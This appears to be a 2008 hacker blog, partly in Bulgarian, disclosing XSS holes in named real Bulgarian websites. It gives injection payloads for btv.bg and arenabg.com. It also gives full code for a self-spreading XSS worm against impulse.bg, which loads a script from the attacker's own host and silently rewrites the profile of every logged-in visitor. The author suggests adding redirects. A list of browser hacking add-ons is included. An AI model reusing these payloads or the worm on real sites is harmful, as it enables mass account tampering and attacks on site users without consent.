new btv.bg multiple xss issues

Posted on 29 February, 2008 by nigon

new year, new site, new…xsses 🙂

http://www.btv.bg/horoscope/daily_horoscope.pcgi?sign_id=

“][/img][/h3][script]alert(‘nigonized’)[/script]<!—

search box xss vuln:

“][script]alert(‘nigonized’)[/script]<!—

to be continued….

Filed under: coding, security, web, XSS | Leave a comment »

ff’s grand sixteen

Posted on 19 February, 2008 by nigon
  1. HackBar [ https://addons.mozilla.org/en-US/firefox/addon/3899 ]
  2. FireBug [ https://addons.mozilla.org/en-US/firefox/addon/1843 ]
  3. Anonymouser [ https://addons.mozilla.org/en-US/firefox/addon/1415 ]
  4. Whois [ https://addons.mozilla.org/en-US/firefox/addon/603 ]
  5. Web Developer [ https://addons.mozilla.org/en-US/firefox/addon/60 ]
  6. SwitchProxy Tool [https://addons.mozilla.org/en-US/firefox/addon/125]
  7. Foxy Proxy [ https://addons.mozilla.org/en-US/firefox/addon/2464 ]
  8. Reload Every [https://addons.mozilla.org/en-US/firefox/addon/115]
  9. User Agent Switcher [ https://addons.mozilla.org/en-US/firefox/addon/59 ]
  10. View Cookies [ https://addons.mozilla.org/en-US/firefox/addon/3587 ]
  11. Modify Headers [ https://addons.mozilla.org/en-US/firefox/addon/967 ]
  12. TiX Now! [https://addons.mozilla.org/en-US/firefox/addon/3601]
  13. Wmlbrowser [ https://addons.mozilla.org/en-US/firefox/addon/62 ]
  14. XSSMe [http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi]
  15. SQL Inject-me [http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi]
  16. Grease Monkey [https://addons.mozilla.org/en-US/firefox/addon/748]

Filed under: firefox, security, web, XSS | Leave a comment »

worming impulse.bg

Posted on 6 February, 2008 by nigon

impulse.bg позволява използването на HTML в “title”, точно както прави myspace.com с малката разлика, че няма забрани.

Веднага прави впечатление, това:

GET /js/scriptaculous/scriptaculous.js

което само по себе си прави нашето занимание по-лесно и красиво. Поставяйки в “Заглавие” полето нещо от рода на:

{script src=”www.mysite.com/impulse.js”}{/script}


impulse.js contents:

var params = “name=wormy!&email=nigon.hacked.in%40gmail.com&country=1&city_id=5&
city=&birthday=11&birthmonth=8&birthyear=1980&gender=1&
search_gender=2&height=0&weight=0&eyes=0&hair=0&
occupation=0&smoke=1&alchohol=1&title=%3Cscript%20src
%3D%22http%3A%2F%2Fmysite.com/impulse.js%22%3E%3C%2Fscript%3E&
info=&msg_report=1&comment_report=1&
Submit=%D0%9F%D1%80%D0%BE%D0%BC%D0%B5%D0%BD%D0%B8”;

var MyAjax = new Ajax.Request (‘/myinfo’, {
method: ‘post’,
parameters: params
});

резултат:
при всяко посещение на “заразения” профил…всички логнати в с-мата ще бъдат също заразени…така до безкрайност…за ефекност бихме могли да променим джаваскрипт кода като сложим екстри от рода на window.location=. Creativity is the key. 😉

Filed under: security, web, XSS | 1 Comment »

ArenaBG XSS

Posted on 30 November, 2007 by nigon

Нищо особено…

http://arenabg.com/series.php?q=
“>’>alert(String.fromCharCode(110,105,103,111,110,105,122,101,100))

Filed under: security, XSS | Leave a comment »